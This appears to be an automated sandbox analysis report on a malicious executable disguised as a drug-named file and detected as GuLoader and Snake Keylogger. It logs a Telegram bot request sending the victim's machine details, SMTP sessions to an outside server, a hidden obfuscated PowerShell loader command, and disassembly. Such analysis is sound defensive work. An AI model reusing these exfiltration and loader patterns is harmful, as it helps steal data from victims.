                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RtXLQQAjB2ieeSGXSdHt6ED65hYGnyx9eSlXCTaHVx6zy2HCJnVsAUWzHU7VuMRT8trg41aKFhDYCJy1Pi%2BJyXPOkvh0OMED89x%2Fv3IJsY0Cln44ouw40eUeSE57HKwwADrRPNXf"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8a8aa610adcd1889-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-07-25 08:06:06 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-07-25 08:06:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              4192.168.2.849717188.114.96.34431372C:\Program Files (x86)\Windows Mail\wab.exe
                                              TimestampBytes transferredDirectionData
                                              2024-07-25 08:06:07 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-07-25 08:06:07 UTC714INHTTP/1.1 200 OK
                                              Date: Thu, 25 Jul 2024 08:06:07 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 23490
                                              Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=20uD79R3pgzFRO3rNSx892btThgdUetcWRuQmu5PTOTVPkSEbkvlH0iI5Q3i%2BL2a%2BXP%2B0hYJIqvLWR%2FKTURdVLkOO%2BrCO7YnVBkopM8QF0f%2FqXRSzJtQImmqFALRfLLI%2B297sxyC"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8a8aa618bf3e5e80-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-07-25 08:06:07 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-07-25 08:06:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              5192.168.2.849719188.114.96.34431372C:\Program Files (x86)\Windows Mail\wab.exe
                                              TimestampBytes transferredDirectionData
                                              2024-07-25 08:06:12 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-07-25 08:06:12 UTC706INHTTP/1.1 200 OK
                                              Date: Thu, 25 Jul 2024 08:06:12 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 23495
                                              Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sdMQRYaSm5Aqklxd4%2BWK0EEWF3cs1El1pqM2QxYXhtotUeC5be0Q0mwxZTP0yssiSVdy5GqExwTATA2sFZ%2FbSB3ZSzSPzSGD%2BoNb3fSFVNW6ibKlZXpHHYwm7pfPoo5bBUlCdIOE"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8a8aa639e9304350-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-07-25 08:06:12 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-07-25 08:06:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              6192.168.2.849721188.114.96.34431372C:\Program Files (x86)\Windows Mail\wab.exe
                                              TimestampBytes transferredDirectionData
                                              2024-07-25 08:06:14 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-07-25 08:06:14 UTC710INHTTP/1.1 200 OK
                                              Date: Thu, 25 Jul 2024 08:06:14 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 23497
                                              Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XUvtwBv5RR90dRMk%2BHnXiU%2FGPRWNiTAaOI4654h6fN7MUfkPeWS83IvZLf9N1a3XGw%2F2wFaNbYNUOCh7iKL84IhR8C%2BQZvA8RlhoENC7UIuT0K7s6eOqOnkqT97BDXQjDWCaI%2Fv6"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8a8aa64388c60f5d-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-07-25 08:06:14 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-07-25 08:06:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              7192.168.2.849724188.114.96.34431372C:\Program Files (x86)\Windows Mail\wab.exe
                                              TimestampBytes transferredDirectionData
                                              2024-07-25 08:06:20 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-07-25 08:06:20 UTC708INHTTP/1.1 200 OK
                                              Date: Thu, 25 Jul 2024 08:06:20 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 23503
                                              Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JRRSuwKOrizSETcQg22NLk4F8raCkX%2Bqki9CpOm5qywiwOIjmy96TAqoHTgeqeJmjZcZM%2F43nYJ0Q0wlVcFcHdpBhU7d%2BpMTS8vdTvQhsXYPPq0rTxJkBb%2BmJQwJUaz6O9EDYsfC"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8a8aa668ce9243bb-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-07-25 08:06:20 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-07-25 08:06:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              8192.168.2.849726188.114.96.34431372C:\Program Files (x86)\Windows Mail\wab.exe
                                              TimestampBytes transferredDirectionData
                                              2024-07-25 08:06:23 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              2024-07-25 08:06:24 UTC714INHTTP/1.1 200 OK
                                              Date: Thu, 25 Jul 2024 08:06:23 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 23506
                                              Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I44fdSxFmVx79s%2BlKmegJNdhDoM4HI%2FrkB63uROh8BSZwErw2eaa%2Bq6DSXY%2FOh2DjVA2fLtrBV09PwZH49H9YMzpyn8eizI0shf%2BCsZXUI154gSeQ%2F32rjb9YW7Bm%2FVOLDd3p0uY"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8a8aa67fbe7b8ce9-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-07-25 08:06:24 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-07-25 08:06:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              9192.168.2.849727149.154.167.2204431372C:\Program Files (x86)\Windows Mail\wab.exe
                                              TimestampBytes transferredDirectionData
                                              2024-07-25 08:06:24 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:061544%0D%0ADate%20and%20Time:%2026/07/2024%20/%2003:56:11%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20061544%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                              Host: api.telegram.org
                                              Connection: Keep-Alive
                                              2024-07-25 08:06:24 UTC344INHTTP/1.1 404 Not Found
                                              Server: nginx/1.18.0
                                              Date: Thu, 25 Jul 2024 08:06:24 GMT
                                              Content-Type: application/json
                                              Content-Length: 55
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                              2024-07-25 08:06:24 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                              Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                              SMTP Packets

                                              TimestampSource PortDest PortSource IPDest IPCommands
                                              Jul 25, 2024 10:06:32.061460972 CEST58749728192.185.142.133192.168.2.8220-joyce.websitewelcome.com ESMTP Exim 4.96.2 #2 Thu, 25 Jul 2024 03:06:31 -0500
                                              220-We do not authorize the use of this system to transport unsolicited,
                                              220 and/or bulk e-mail.
                                              Jul 25, 2024 10:06:32.061825037 CEST49728587192.168.2.8192.185.142.133EHLO 061544
                                              Jul 25, 2024 10:06:32.180141926 CEST58749728192.185.142.133192.168.2.8250-joyce.websitewelcome.com Hello 061544 [8.46.123.33]
                                              250-SIZE 52428800
                                              250-8BITMIME
                                              250-PIPELINING
                                              250-PIPECONNECT
                                              250-AUTH PLAIN LOGIN
                                              250-STARTTLS
                                              250 HELP
                                              Jul 25, 2024 10:06:32.180402040 CEST49728587192.168.2.8192.185.142.133STARTTLS
                                              Jul 25, 2024 10:06:32.299238920 CEST58749728192.185.142.133192.168.2.8220 TLS go ahead
                                              Jul 25, 2024 10:06:35.852786064 CEST58749729192.185.142.133192.168.2.8220-joyce.websitewelcome.com ESMTP Exim 4.96.2 #2 Thu, 25 Jul 2024 03:06:35 -0500
                                              220-We do not authorize the use of this system to transport unsolicited,
                                              220 and/or bulk e-mail.
                                              Jul 25, 2024 10:06:35.852926016 CEST49729587192.168.2.8192.185.142.133EHLO 061544
                                              Jul 25, 2024 10:06:35.995678902 CEST58749729192.185.142.133192.168.2.8250-joyce.websitewelcome.com Hello 061544 [8.46.123.33]
                                              250-SIZE 52428800
                                              250-8BITMIME
                                              250-PIPELINING
                                              250-PIPECONNECT
                                              250-AUTH PLAIN LOGIN
                                              250-STARTTLS
                                              250 HELP
                                              Jul 25, 2024 10:06:35.995861053 CEST49729587192.168.2.8192.185.142.133STARTTLS
                                              Jul 25, 2024 10:06:36.114645958 CEST58749729192.185.142.133192.168.2.8220 TLS go ahead

                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:04:04:30
                                              Start date:25/07/2024
                                              Path:C:\Users\user\Desktop\Apixaban - August 2024.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\Apixaban - August 2024.exe"
                                              Imagebase:0x400000
                                              File size:852'456 bytes
                                              MD5 hash:0E198C53CE387336130BE0C8AD27B7AF
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:2
                                              Start time:04:04:33
                                              Start date:25/07/2024
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:"powershell.exe" -windowstyle hidden "$nonrationally=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Kompottens.Sub';$Blgekams=$nonrationally.SubString(70407,3);.$Blgekams($nonrationally) "
                                              Imagebase:0xa60000
                                              File size:433'152 bytes
                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2247218971.000000000925B000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:3
                                              Start time:04:04:33
                                              Start date:25/07/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6ee680000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:10
                                              Start time:04:05:44
                                              Start date:25/07/2024
                                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                              Imagebase:0x110000
                                              File size:516'608 bytes
                                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000A.00000002.2653419991.00000000251E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:high
                                              Has exited:false

                                              Disassembly

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:20.1%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:22.2%
                                                Total number of Nodes:1277
                                                Total number of Limit Nodes:34
                                                execution_graph 3717 404241 lstrcpynW lstrlenW 3718 401d41 GetDC GetDeviceCaps 3719 402b1b 18 API calls 3718->3719 3720 401d5f MulDiv ReleaseDC 3719->3720 3721 402b1b 18 API calls 3720->3721 3722 401d7e 3721->3722 3723 405f0a 18 API calls 3722->3723 3724 401db7 CreateFontIndirectW 3723->3724 3725 4024e6 3724->3725 3726 401a42 3727 402b1b 18 API calls 3726->3727 3728 401a48 3727->3728 3729 402b1b 18 API calls 3728->3729 3730 4019f0 3729->3730 3731 402744 3732 40273f 3731->3732 3732->3731 3733 402754 FindNextFileW 3732->3733 3734 4027a6 3733->3734 3736 40275f 3733->3736 3737 405ee8 lstrcpynW 3734->3737 3737->3736 3745 401cc6 3746 402b1b 18 API calls 3745->3746 3747 401cd9 SetWindowLongW 3746->3747 3748 4029c5 3747->3748 3749 4045c8 3750 4045f4 3749->3750 3751 404605 3749->3751 3810 4056a8 GetDlgItemTextW 3750->3810 3753 404611 GetDlgItem 3751->3753 3785 404670 3751->3785 3757 404625 3753->3757 3754 4045ff 3755 40617c 5 API calls 3754->3755 3755->3751 3756 404639 SetWindowTextW 3762 40412d 19 API calls 3756->3762 3757->3756 3761 4059de 4 API calls 3757->3761 3758 4048f5 3760 404194 8 API calls 3758->3760 3765 404909 3760->3765 3766 40462f 3761->3766 3767 404655 3762->3767 3763 405f0a 18 API calls 3768 4046e4 SHBrowseForFolderW 3763->3768 3764 404784 3769 405a3b 18 API calls 3764->3769 3766->3756 3776 405933 3 API calls 3766->3776 3770 40412d 19 API calls 3767->3770 3771 404754 3768->3771 3772 4046fc CoTaskMemFree 3768->3772 3773 40478a 3769->3773 3774 404663 3770->3774 3771->3758 3812 4056a8 GetDlgItemTextW 3771->3812 3775 405933 3 API calls 3772->3775 3813 405ee8 lstrcpynW 3773->3813 3811 404162 SendMessageW 3774->3811 3778 404709 3775->3778 3776->3756 3781 404740 SetDlgItemTextW 3778->3781 3786 405f0a 18 API calls 3778->3786 3780 404669 3783 406252 3 API calls 3780->3783 3781->3771 3782 4047a1 3784 406252 3 API calls 3782->3784 3783->3785 3793 4047a9 3784->3793 3785->3758 3785->3763 3785->3771 3787 404728 lstrcmpiW 3786->3787 3787->3781 3790 404739 lstrcatW 3787->3790 3788 4047e8 3814 405ee8 lstrcpynW 3788->3814 3790->3781 3791 4047ef 3792 4059de 4 API calls 3791->3792 3794 4047f5 GetDiskFreeSpaceW 3792->3794 3793->3788 3797 40597f 2 API calls 3793->3797 3799 40483a 3793->3799 3796 404818 MulDiv 3794->3796 3794->3799 3796->3799 3797->3793 3798 4048a4 3801 4048c7 3798->3801 3803 40140b 2 API calls 3798->3803 3799->3798 3815 404976 3799->3815 3823 40414f KiUserCallbackDispatcher 3801->3823 3802 404896 3804 4048a6 SetDlgItemTextW 3802->3804 3805 40489b 3802->3805 3803->3801 3804->3798 3808 404976 21 API calls 3805->3808 3807 4048e3 3807->3758 3824 40455d 3807->3824 3808->3798 3810->3754 3811->3780 3812->3764 3813->3782 3814->3791 3816 404993 3815->3816 3817 405f0a 18 API calls 3816->3817 3818 4049c8 3817->3818 3819 405f0a 18 API calls 3818->3819 3820 4049d3 3819->3820 3821 405f0a 18 API calls 3820->3821 3822 404a04 lstrlenW wsprintfW SetDlgItemTextW 3821->3822 3822->3802 3823->3807 3825 404570 SendMessageW 3824->3825 3826 40456b 3824->3826 3825->3758 3826->3825 3827 4042ca 3830 4043fc 3827->3830 3831 4042e2 3827->3831 3828 404466 3829 404470 GetDlgItem 3828->3829 3834 404538 3828->3834 3832 4044f9 3829->3832 3833 40448a 3829->3833 3830->3828 3830->3834 3837 404437 GetDlgItem SendMessageW 3830->3837 3835 40412d 19 API calls 3831->3835 3832->3834 3842 40450b 3832->3842 3833->3832 3841 4044b0 6 API calls 3833->3841 3836 404194 8 API calls 3834->3836 3838 404349 3835->3838 3840 404533 3836->3840 3858 40414f KiUserCallbackDispatcher 3837->3858 3839 40412d 19 API calls 3838->3839 3844 404356 CheckDlgButton 3839->3844 3841->3832 3845 404521 3842->3845 3846 404511 SendMessageW 3842->3846 3856 40414f KiUserCallbackDispatcher 3844->3856 3845->3840 3849 404527 SendMessageW 3845->3849 3846->3845 3847 404461 3850 40455d SendMessageW 3847->3850 3849->3840 3850->3828 3851 404374 GetDlgItem 3857 404162 SendMessageW 3851->3857 3853 40438a SendMessageW 3854 4043b0 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 3853->3854 3855 4043a7 GetSysColor 3853->3855 3854->3840 3855->3854 3856->3851 3857->3853 3858->3847 3859 401bca 3860 402b1b 18 API calls 3859->3860 3861 401bd1 3860->3861 3862 402b1b 18 API calls 3861->3862 3863 401bdb 3862->3863 3864 401beb 3863->3864 3865 402b38 18 API calls 3863->3865 3866 401bfb 3864->3866 3867 402b38 18 API calls 3864->3867 3865->3864 3868 401c06 3866->3868 3869 401c4a 3866->3869 3867->3866 3870 402b1b 18 API calls 3868->3870 3871 402b38 18 API calls 3869->3871 3872 401c0b 3870->3872 3873 401c4f 3871->3873 3874 402b1b 18 API calls 3872->3874 3875 402b38 18 API calls 3873->3875 3876 401c14 3874->3876 3877 401c58 FindWindowExW 3875->3877 3878 401c3a SendMessageW 3876->3878 3879 401c1c SendMessageTimeoutW 3876->3879 3880 401c7a 3877->3880 3878->3880 3879->3880 3881 4024ca 3882 402b38 18 API calls 3881->3882 3883 4024d1 3882->3883 3886 405b54 GetFileAttributesW CreateFileW 3883->3886 3885 4024dd 3886->3885 3887 40194b 3888 402b1b 18 API calls 3887->3888 3889 401952 3888->3889 3890 402b1b 18 API calls 3889->3890 3891 40195c 3890->3891 3892 402b38 18 API calls 3891->3892 3893 401965 3892->3893 3894 401979 lstrlenW 3893->3894 3895 4019b5 3893->3895 3896 401983 3894->3896 3896->3895 3900 405ee8 lstrcpynW 3896->3900 3898 40199e 3898->3895 3899 4019ab lstrlenW 3898->3899 3899->3895 3900->3898 3904 4019cf 3905 402b38 18 API calls 3904->3905 3906 4019d6 3905->3906 3907 402b38 18 API calls 3906->3907 